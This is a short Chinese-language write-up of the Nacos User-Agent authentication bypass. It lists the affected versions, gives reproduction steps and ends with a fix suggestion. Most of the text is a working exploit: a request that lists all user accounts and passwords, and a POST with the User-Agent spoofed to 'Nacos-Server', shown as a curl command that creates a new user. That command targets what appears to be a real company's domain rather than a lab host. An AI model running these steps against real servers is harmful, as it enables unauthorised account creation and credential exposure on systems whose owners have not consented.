0X01 漏洞描述
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
0X02 影响版本
<= Nacos 2.0.0-ALPHA.1
< Nacos 1.4.1
0X03 漏洞复现
1. 访问用户列表接口
http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9
如出现下面的所示的页面,列出了所有登录的账号和密码说明存在漏洞
2. 向服务器添加一个新的账号和密码
访问nacos/v1,截取请求包,将GET请求换为POST,User-Agent值修改为:Nacos-Server
服务器返回创建用户成功
curl -X POST 'https://lingting.mininglamp.com/nacos/v1/auth/users?username=test&password=test'
3. 再次查看用户列表,发现多了一个我们添加的账户
4. 用创建的账号进行登录
0X04 修复建议
升级至最新版